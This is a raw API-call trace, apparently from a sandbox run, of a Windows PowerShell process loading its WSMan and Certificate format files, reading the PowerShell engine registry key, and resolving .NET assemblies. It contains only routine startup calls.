	[0160.727] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x25c44044, Data2=0x2bfa, Data3=0x46b4, Data4=([0]=0x89, [1]=0xaf, [2]=0x98, [3]=0x27, [4]=0xd6, [5]=0xb0, [6]=0x32, [7]=0x89))) returned 0x0
	[0160.846] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0160.846] SetErrorMode (uMode=0x1) returned 0x1
	[0160.846] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x30c
	[0161.027] GetFileType (hFile=0x30c) returned 0x1
	[0161.028] SetErrorMode (uMode=0x1) returned 0x1
	[0161.028] GetFileType (hFile=0x30c) returned 0x1
	[0161.028] ReadFile (in: hFile=0x30c, lpBuffer=0x3469fe0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x3469fe0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0161.077] ReadFile (in: hFile=0x30c, lpBuffer=0x3469fe0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x3469fe0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0161.291] ReadFile (in: hFile=0x30c, lpBuffer=0x3469fe0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x3469fe0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0161.698] ReadFile (in: hFile=0x30c, lpBuffer=0x3469fe0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x3469fe0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0161.933] ReadFile (in: hFile=0x30c, lpBuffer=0x3469fe0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x3469fe0*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0162.353] ReadFile (in: hFile=0x30c, lpBuffer=0x3469fe0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x3469fe0*, lpNumberOfBytesRead=0x12d458*=0xfb2, lpOverlapped=0x0) returned 1
	[0162.866] ReadFile (in: hFile=0x30c, lpBuffer=0x34696fa, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x34696fa*, lpNumberOfBytesRead=0x12d458*=0x0, lpOverlapped=0x0) returned 1
	[0163.380] ReadFile (in: hFile=0x30c, lpBuffer=0x3469fe0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x3469fe0*, lpNumberOfBytesRead=0x12d458*=0x0, lpOverlapped=0x0) returned 1
	[0163.662] CloseHandle (hObject=0x30c) returned 1
	[0167.686] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0167.686] SetErrorMode (uMode=0x1) returned 0x1
	[0167.686] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d400 | out: lpFileInformation=0x12d400*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0167.686] SetErrorMode (uMode=0x1) returned 0x1
	[0167.686] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0167.686] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d4e8 | out: phkResult=0x12d4e8*=0x30c) returned 0x0
	[0167.686] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d46c, lpData=0x0, lpcbData=0x12d468*=0x0 | out: lpType=0x12d46c*=0x1, lpData=0x0, lpcbData=0x12d468*=0x56) returned 0x0
	[0167.686] CoTaskMemAlloc (cb=0x5a) returned 0x2119e0
	[0167.686] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d43c, lpData=0x2119e0, lpcbData=0x12d438*=0x56 | out: lpType=0x12d43c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d438*=0x56) returned 0x0
	[0167.686] CoTaskMemFree (pv=0x2119e0) 
	[0167.687] RegCloseKey (hKey=0x30c) returned 0x0
	[0167.687] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0167.687] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0167.689] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x7db89d0a, Data2=0xc55d, Data3=0x4d1c, Data4=([0]=0xa7, [1]=0x84, [2]=0xf8, [3]=0x2a, [4]=0x81, [5]=0xdf, [6]=0x3a, [7]=0xf6))) returned 0x0
	[0167.693] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x70430d88, Data2=0x6e6b, Data3=0x4dc0, Data4=([0]=0xa6, [1]=0xa2, [2]=0x7f, [3]=0x24, [4]=0xd9, [5]=0xe5, [6]=0x3f, [7]=0x74))) returned 0x0
	[0167.694] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x3d728779, Data2=0x74e6, Data3=0x4374, Data4=([0]=0x93, [1]=0x31, [2]=0x4b, [3]=0x5f, [4]=0x8a, [5]=0x5d, [6]=0xdb, [7]=0x6c))) returned 0x0
	[0167.695] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x23c78211, Data2=0xf8a3, Data3=0x4dff, Data4=([0]=0xad, [1]=0x40, [2]=0x20, [3]=0x1, [4]=0x4f, [5]=0x3, [6]=0xb4, [7]=0x7e))) returned 0x0
	[0167.696] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x38829248, Data2=0x369, Data3=0x4566, Data4=([0]=0x8a, [1]=0xfd, [2]=0x4, [3]=0x63, [4]=0xcd, [5]=0xf8, [6]=0xc5, [7]=0x90))) returned 0x0
	[0167.696] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x82455d0b, Data2=0x3300, Data3=0x4c81, Data4=([0]=0x94, [1]=0x6f, [2]=0x74, [3]=0xab, [4]=0x4, [5]=0x2, [6]=0x73, [7]=0x72))) returned 0x0
	[0167.697] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0167.697] SetErrorMode (uMode=0x1) returned 0x1
	[0167.697] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x30c
	[0167.697] GetFileType (hFile=0x30c) returned 0x1
	[0167.697] SetErrorMode (uMode=0x1) returned 0x1
	[0167.697] GetFileType (hFile=0x30c) returned 0x1
	[0167.697] ReadFile (in: hFile=0x30c, lpBuffer=0x34b5d40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x34b5d40*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0167.698] ReadFile (in: hFile=0x30c, lpBuffer=0x34b5d40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x34b5d40*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0167.699] ReadFile (in: hFile=0x30c, lpBuffer=0x34b5d40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x34b5d40*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0167.699] ReadFile (in: hFile=0x30c, lpBuffer=0x34b5d40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x34b5d40*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0167.700] ReadFile (in: hFile=0x30c, lpBuffer=0x34b5d40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x34b5d40*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0167.700] ReadFile (in: hFile=0x30c, lpBuffer=0x34b5d40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x34b5d40*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0167.700] ReadFile (in: hFile=0x30c, lpBuffer=0x34b5d40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x34b5d40*, lpNumberOfBytesRead=0x12d458*=0xaca, lpOverlapped=0x0) returned 1
	[0167.701] ReadFile (in: hFile=0x30c, lpBuffer=0x34b5372, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x34b5372*, lpNumberOfBytesRead=0x12d458*=0x0, lpOverlapped=0x0) returned 1
	[0167.701] ReadFile (in: hFile=0x30c, lpBuffer=0x34b5d40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x34b5d40*, lpNumberOfBytesRead=0x12d458*=0x0, lpOverlapped=0x0) returned 1
	[0167.701] CloseHandle (hObject=0x30c) returned 1
	[0167.701] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0167.701] SetErrorMode (uMode=0x1) returned 0x1
	[0167.701] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d400 | out: lpFileInformation=0x12d400*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0167.701] SetErrorMode (uMode=0x1) returned 0x1
	[0167.701] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0167.701] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d4e8 | out: phkResult=0x12d4e8*=0x30c) returned 0x0
	[0167.702] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d46c, lpData=0x0, lpcbData=0x12d468*=0x0 | out: lpType=0x12d46c*=0x1, lpData=0x0, lpcbData=0x12d468*=0x56) returned 0x0
	[0167.702] CoTaskMemAlloc (cb=0x5a) returned 0x2119e0
	[0167.702] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d43c, lpData=0x2119e0, lpcbData=0x12d438*=0x56 | out: lpType=0x12d43c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d438*=0x56) returned 0x0
	[0167.702] CoTaskMemFree (pv=0x2119e0) 
	[0167.702] RegCloseKey (hKey=0x30c) returned 0x0
	[0167.702] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0167.702] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0168.405] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x12c970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0168.409] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12c970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0168.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x12c970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0168.425] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0180.466] VirtualQuery (in: lpAddress=0x12bf80, lpBuffer=0x12ce40, dwLength=0x30 | out: lpBuffer=0x12ce40*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0180.468] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x99f41bb3, Data2=0x4a14, Data3=0x45bd, Data4=([0]=0xa6, [1]=0x7c, [2]=0x9c, [3]=0xb7, [4]=0x1d, [5]=0x88, [6]=0x8, [7]=0x9b))) returned 0x0
	[0180.469] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0xe9b0df5a, Data2=0xbef5, Data3=0x4fee, Data4=([0]=0xb1, [1]=0x6e, [2]=0xe2, [3]=0x8e, [4]=0x54, [5]=0x19, [6]=0xc2, [7]=0x51))) returned 0x0
	[0180.469] VirtualQuery (in: lpAddress=0x12c130, lpBuffer=0x12cff0, dwLength=0x30 | out: lpBuffer=0x12cff0*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0180.470] VirtualQuery (in: lpAddress=0x12c130, lpBuffer=0x12cff0, dwLength=0x30 | out: lpBuffer=0x12cff0*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0180.471] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0xeef37d85, Data2=0xb1df, Data3=0x4df0, Data4=([0]=0xae, [1]=0x32, [2]=0xa8, [3]=0xa6, [4]=0xc0, [5]=0xea, [6]=0x8d, [7]=0xf0))) returned 0x0
	[0180.474] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x207e8f02, Data2=0x1063, Data3=0x4414, Data4=([0]=0xae, [1]=0x48, [2]=0x9a, [3]=0x9f, [4]=0xaf, [5]=0xae, [6]=0x4d, [7]=0xd6))) returned 0x0
	[0180.474] VirtualQuery (in: lpAddress=0x12c380, lpBuffer=0x12d240, dwLength=0x30 | out: lpBuffer=0x12d240*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0181.103] VirtualQuery (in: lpAddress=0x12b9f0, lpBuffer=0x12c8b0, dwLength=0x30 | out: lpBuffer=0x12c8b0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0181.126] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x67c658d3, Data2=0x26da, Data3=0x45e6, Data4=([0]=0xa9, [1]=0xc4, [2]=0x6a, [3]=0xe1, [4]=0xc4, [5]=0xe9, [6]=0xa4, [7]=0x4d))) returned 0x0
	[0181.126] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x7fd9c3a, Data2=0x5150, Data3=0x4532, Data4=([0]=0x9d, [1]=0xf0, [2]=0xe8, [3]=0x6a, [4]=0x24, [5]=0xb0, [6]=0xa0, [7]=0xa9))) returned 0x0
	[0181.127] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x17a776b5, Data2=0x40f3, Data3=0x4fa2, Data4=([0]=0x86, [1]=0x1d, [2]=0xd3, [3]=0xfd, [4]=0x6b, [5]=0x5b, [6]=0xae, [7]=0xcc))) returned 0x0
	[0181.127] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x60f50e41, Data2=0xbfaa, Data3=0x46a7, Data4=([0]=0xa4, [1]=0x5a, [2]=0x42, [3]=0x4a, [4]=0xbb, [5]=0xd2, [6]=0x9, [7]=0x77))) returned 0x0
	[0181.128] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0xb6ce1242, Data2=0x1d2d, Data3=0x49f0, Data4=([0]=0xa0, [1]=0x4f, [2]=0xd9, [3]=0xf6, [4]=0x61, [5]=0x81, [6]=0x9d, [7]=0x19))) returned 0x0
	[0181.128] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x1562d5cb, Data2=0x9377, Data3=0x40ba, Data4=([0]=0xaa, [1]=0x9e, [2]=0xe9, [3]=0xb1, [4]=0x1b, [5]=0x88, [6]=0x80, [7]=0x68))) returned 0x0
	[0181.128] VirtualQuery (in: lpAddress=0x12c0c0, lpBuffer=0x12cf80, dwLength=0x30 | out: lpBuffer=0x12cf80*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0181.129] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x20883fc6, Data2=0x1012, Data3=0x4cdd, Data4=([0]=0xbb, [1]=0x17, [2]=0x12, [3]=0xa0, [4]=0x93, [5]=0xc9, [6]=0xb6, [7]=0x1e))) returned 0x0
	[0181.129] VirtualQuery (in: lpAddress=0x12c0c0, lpBuffer=0x12cf80, dwLength=0x30 | out: lpBuffer=0x12cf80*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0181.130] VirtualQuery (in: lpAddress=0x12c0c0, lpBuffer=0x12cf80, dwLength=0x30 | out: lpBuffer=0x12cf80*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0191.753] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0191.753] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0191.753] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0191.754] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x9cab8880, Data2=0x11f1, Data3=0x44ca, Data4=([0]=0x8d, [1]=0x5b, [2]=0x24, [3]=0x6c, [4]=0x50, [5]=0xd2, [6]=0xeb, [7]=0x96))) returned 0x0
	[0191.754] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0191.754] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0191.754] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0191.755] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0191.755] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0191.755] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0191.755] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0191.755] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0191.755] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0191.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
